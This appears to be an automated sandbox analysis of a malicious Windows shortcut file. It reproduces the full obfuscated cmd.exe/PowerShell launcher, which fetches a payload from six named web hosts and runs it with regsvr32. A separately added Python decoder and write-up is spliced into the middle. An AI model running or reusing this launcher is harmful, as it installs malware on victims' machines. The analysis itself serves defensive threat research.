Analysis Overview
SHA256
013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24
Threat Level: Likely malicious
The file 013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24 was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Command and Scripting Interpreter: PowerShell
An obfuscated cmd.exe command-line is typically used to evade detection.
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 11:51
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 11:51
Reported
2024-11-13 11:53
Platform
win7-20240903-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1732 wrote to memory of 2712 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1732 wrote to memory of 2712 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1732 wrote to memory of 2712 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2712 wrote to memory of 2792 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2712 wrote to memory of 2792 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2712 wrote to memory of 2792 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24.lnk
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /v:on /c GTlZotS9zHLhEzCDMVbFWmYDHjUPPOgRtOUiWEAvvJDy26RCVDiWwI2MM1NVc/bUuTmj+3A7||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$Np='ICAgICAgICBXcml0ZS1Ib3N0ICJQZXhLZyI7JFByb2dyZXNzUH';$dx='JlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2JhdWRlc2lnbi5nZS9hc3NldHMvMUJBRUZtT1lxSWY3SExnLyIsImh0dHA6Ly9hZWdpc2NhcGNvcnAuY29tL3BsdWdpbnMtb2xkL1ljbDdLLyIsImh0dHA6Ly9iZW5yaWJ1eS5jb20vdGVzdC9QNS8iLCJodHRwczovL2FraWJhLXRyYXZlbC5jb20vc3RhdHMvTWNOQ1dmWklOUFdjYXlyeWlpLyIsImh0dHA6Ly9maXJlc3RhcnRlcnNwb3J0cy5jb20vYWRtaW4vUy8iLCJodHRwOi8vYXNzZW1ibHlsb2dpY2EubmwvZGV2L29oVTBKRy8iKTskdD0iSVJxUkIiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcaUtGc3FDQ3N6ay5IcFU7UmVnc3ZyMzIuZXhlICIkZFxpS0ZzcUNDc3prLkhwVSI7YnJlYWt9IGNhdGNoIHsgfX0=';$CwnbLX=[System.Convert]::FromBase64String($Np+$dx);$iZ=[System.Text.Encoding]::ASCII.GetString($CwnbLX); iex ($iZ)}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c "&{$Np='ICAgICAgICBXcml0ZS1Ib3N0ICJQZXhLZyI7JFByb2dyZXNzUH';$dx='JlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2JhdWRlc2lnbi5nZS9hc3NldHMvMUJBRUZtT1lxSWY3SExnLyIsImh0dHA6Ly9hZWdpc2NhcGNvcnAuY29tL3BsdWdpbnMtb2xkL1ljbDdLLyIsImh0dHA6Ly9iZW5yaWJ1eS5jb20vdGVzdC9QNS8iLCJodHRwczovL2FraWJhLXRyYXZlbC5jb20vc3RhdHMvTWNOQ1dmWklOUFdjYXlyeWlpLyIsImh0dHA6Ly9maXJlc3RhcnRlcnNwb3J0cy5jb20vYWRtaW4vUy8iLCJodHRwOi8vYXNzZW1ibHlsb2dpY2EubmwvZGV2L29oVTBKRy8iKTskdD0iSVJxUkIiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcaUtGc3FDQ3N6ay5IcFU7UmVnc3ZyMzIuZXhlICIkZFxpS0ZzcUNDc3prLkhwVSI7YnJlYWt9IGNhdGNoIHsgfX0=';$CwnbLX=[System.Convert]::FromBase64String($Np+$dx);$iZ=[System.Text.Encoding]::ASCII.GetString($CwnbLX); iex ($iZ)}"
Network
Files
memory/2792-40-0x000007FEF55BE000-0x000007FEF55BF000-memory.dmp
memory/2792-41-0x000000001B780000-0x000000001BA62000-memory.dmp
memory/2792-42-0x0000000001EF0000-0x0000000001EF8000-memory.dmp
memory/2792-43-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2792-44-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2792-45-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2792-46-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2792-48-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
memory/2792-47-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 11:51
Reported
2024-11-13 11:53
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2872 wrote to memory of 3868 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2872 wrote to memory of 3868 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 3868 wrote to memory of 5032 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3868 wrote to memory of 5032 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5032 wrote to memory of 5108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\regsvr32.exe |
| PID 5032 wrote to memory of 5108 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\regsvr32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\013708ddc8582173245bbda168f07ff1fe827889a0cb70f0238f4e07c21b4e24.lnk
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /v:on /c GTlZotS9zHLhEzCDMVbFWmYDHjUPPOgRtOUiWEAvvJDy26RCVDiWwI2MM1NVc/bUuTmj+3A7||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$Np='ICAgICAgICBXcml0ZS1Ib3N0ICJQZXhLZyI7JFByb2dyZXNzUH';$dx='JlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2JhdWRlc2lnbi5nZS9hc3NldHMvMUJBRUZtT1lxSWY3SExnLyIsImh0dHA6Ly9hZWdpc2NhcGNvcnAuY29tL3BsdWdpbnMtb2xkL1ljbDdLLyIsImh0dHA6Ly9iZW5yaWJ1eS5jb20vdGVzdC9QNS8iLCJodHRwczovL2FraWJhLXRyYXZlbC5jb20vc3RhdHMvTWNOQ1dmWklOUFdjYXlyeWlpLyIsImh0dHA6Ly9maXJlc3RhcnRlcnNwb3J0cy5jb20vYWRtaW4vUy8iLCJodHRwOi8vYXNzZW1ibHlsb2dpY2EubmwvZGV2L29oVTBKRy8iKTskdD0iSVJxUkIiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcaUtGc3FDQ3N6ay5IcFU7UmVnc3ZyMzIuZXhlICIkZFxpS0ZzcUNDc3prLkhwVSI7YnJlYWt9IGNhdGNoIHsgfX0=';$CwnbLX=[System.Convert]::FromBase64String($Np+$dx);$iZ=[System.Text.Encoding]::ASCII.GetString($CwnbLX); iex ($iZ)}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c "&{$Np='ICAgICAgICBXcml0ZS1Ib3N0ICJQZXhLZyI7JFByb2dyZXNzUH';$dx='JlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2JhdWRlc2lnbi5nZS9hc3NldHMvMUJBRUZtT1lxSWY3SExnLyIsImh0dHA6Ly9hZWdpc2NhcGNvcnAuY29tL3BsdWdpbnMtb2xkL1ljbDdLLyIsImh0dHA6Ly9iZW5yaWJ1eS5jb20vdGVzdC9QNS8iLCJodHRwczovL2FraWJhLXRyYXZlbC5jb20vc3RhdHMvTWNOQ1dmWklOUFdjYXlyeWlpLyIsImh0dHA6Ly9maXJlc3RhcnRlcnNwb3J0cy5jb20vYWRtaW4vUy8iLCJodHRwOi8vYXNzZW1ibHlsb2dpY2EubmwvZGV2L29oVTBKRy8iKTskdD0iSVJxUkIiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcaUtGc3FDQ3N6ay5IcFU7UmVnc3ZyMzIuZXhlICIkZFxpS0ZzcUNDc3prLkhwVSI7YnJlYWt9IGNhdGNoIHsgfX0=';$CwnbLX=[System.Convert]::FromBase64String($Np+$dx);$iZ=[System.Text.Encoding]::ASCII.GetString($CwnbLX); iex ($iZ)}"
C:\Windows\system32\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\IRqRB\iKFsqCCszk.HpU
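Decoding the launcher seen in both detonations (the caret-obfuscated cmd.exe line that spawns powershell.exe, and the regsvr32.exe call it ends in), as an added example that is not part of this report: a short Python script that undoes cmd.exe caret escaping, joins the two base64 fragments in the order the script itself concatenates them inside FromBase64String, and pulls the download list, drop directory, dropped file name and loader out of the decoded stage. The command line is the one captured in the behavioral1 process tree; the function names and regexes are my own and assume only this launcher's shape (single-quoted base64 fragments in PowerShell variables, joined with +).

```python
import base64
import re

# Launcher command line copied from the second cmd.exe in the behavioral1
# process tree of this report. Everything before "||goto&" is junk: the random
# token fails as a command, "goto" without a label fails too, and "&" runs
# powershell.exe unconditionally. The carets in p^o^w^e^r^s^h^e^l^l are
# cmd.exe escape characters that disappear at parse time, which is why a plain
# substring match on "powershell" in the command line misses it.
CMDLINE = r'''"C:\Windows\system32\cmd.exe" /v:on /c GTlZotS9zHLhEzCDMVbFWmYDHjUPPOgRtOUiWEAvvJDy26RCVDiWwI2MM1NVc/bUuTmj+3A7||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$Np='ICAgICAgICBXcml0ZS1Ib3N0ICJQZXhLZyI7JFByb2dyZXNzUH';$dx='JlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2JhdWRlc2lnbi5nZS9hc3NldHMvMUJBRUZtT1lxSWY3SExnLyIsImh0dHA6Ly9hZWdpc2NhcGNvcnAuY29tL3BsdWdpbnMtb2xkL1ljbDdLLyIsImh0dHA6Ly9iZW5yaWJ1eS5jb20vdGVzdC9QNS8iLCJodHRwczovL2FraWJhLXRyYXZlbC5jb20vc3RhdHMvTWNOQ1dmWklOUFdjYXlyeWlpLyIsImh0dHA6Ly9maXJlc3RhcnRlcnNwb3J0cy5jb20vYWRtaW4vUy8iLCJodHRwOi8vYXNzZW1ibHlsb2dpY2EubmwvZGV2L29oVTBKRy8iKTskdD0iSVJxUkIiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcaUtGc3FDQ3N6ay5IcFU7UmVnc3ZyMzIuZXhlICIkZFxpS0ZzcUNDc3prLkhwVSI7YnJlYWt9IGNhdGNoIHsgfX0=';$CwnbLX=[System.Convert]::FromBase64String($Np+$dx);$iZ=[System.Text.Encoding]::ASCII.GetString($CwnbLX); iex ($iZ)}"'''


def strip_carets(cmdline: str) -> str:
    """Undo cmd.exe caret escaping (p^o^w^e^r -> power)."""
    return cmdline.replace("^", "")


def decode_stage2(cmdline: str) -> str:
    """Rebuild the base64 exactly as the launcher does and decode it.

    The payload is split across two variables ($Np and $dx) and only joined at
    runtime, so neither literal is valid base64 on its own. Resolving the
    argument of FromBase64String(...) gives the order without guessing.
    """
    clean = strip_carets(cmdline)
    literals = dict(re.findall(r"\$(\w+)='([A-Za-z0-9+/=]*)'", clean))
    expr = re.search(r"FromBase64String\(([^)]+)\)", clean).group(1)  # "$Np+$dx"
    joined = "".join(literals[part.strip().lstrip("$")] for part in expr.split("+"))
    return base64.b64decode(joined).decode("ascii")


def extract_iocs(script: str) -> dict:
    """Pull download URLs, drop location and loader out of the decoded stage."""
    urls = re.findall(r'"(https?://[^"]+)"', script)
    drop_dir = re.search(r'\$t="([^"]+)"', script)            # $t="IRqRB"
    drop_file = re.search(r"-OutFile \$d\\([^;\s]+)", script)  # $d\<name>
    loader = re.search(r"\b(regsvr32\.exe|rundll32\.exe|mshta\.exe)\b", script, re.I)
    return {
        "urls": urls,
        "drop_dir": drop_dir.group(1) if drop_dir else None,
        "drop_file": drop_file.group(1) if drop_file else None,
        "loader": loader.group(1) if loader else None,
    }


if __name__ == "__main__":
    stage2 = decode_stage2(CMDLINE)
    print(stage2.strip())
    for key, value in extract_iocs(stage2).items():
        print(f"{key}: {value}")
```

The decoded stage silences progress output, then walks six URLs in order with Invoke-WebRequest, writes the response to $env:TMP\..\IRqRB\iKFsqCCszk.HpU (which resolves to %LOCALAPPDATA%\IRqRB\, matching the file listed under behavioral2), hands it to Regsvr32.exe and breaks out of the loop on the first success. That is why only baudesign.ge shows up in the network table: the first download succeeded, so the remaining five hosts were never contacted, and a block list built only from the sandbox traffic would miss them. The whole script is passed to iex, so on a host with PowerShell script block logging enabled the same decoded text lands in event 4104.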
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | baudesign.ge | udp |
| GE | 45.138.44.231:80 | baudesign.ge | tcp |
| GE | 45.138.44.231:443 | baudesign.ge | tcp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.44.138.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
memory/5032-0-0x00007FFF34EC3000-0x00007FFF34EC5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dbn0weny.32b.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5032-1-0x00000234B7A40000-0x00000234B7A62000-memory.dmp
memory/5032-11-0x00007FFF34EC0000-0x00007FFF35981000-memory.dmp
memory/5032-12-0x00007FFF34EC0000-0x00007FFF35981000-memory.dmp
C:\Users\Admin\AppData\Local\IRqRB\iKFsqCCszk.HpU
| MD5 | 66aa173a8aff58102540c8f7e4b3bd07 |
| SHA1 | 6731120f0a7523f530303ba6cbd18e016f740789 |
| SHA256 | 36c850f3cc750f3a0dcbb1fe6e8c278529e9ec59628893c5cbb1836508dbf329 |
| SHA512 | e810c657473e2dad9bb6c04714a37f6f7c34d4243b8006441841947efcff9c31b0511b80bed6f6211d1f23a2f4bf1b0984624c33911d31802eb37dd1771e6ff3 |
memory/5032-17-0x00007FFF34EC0000-0x00007FFF35981000-memory.dmp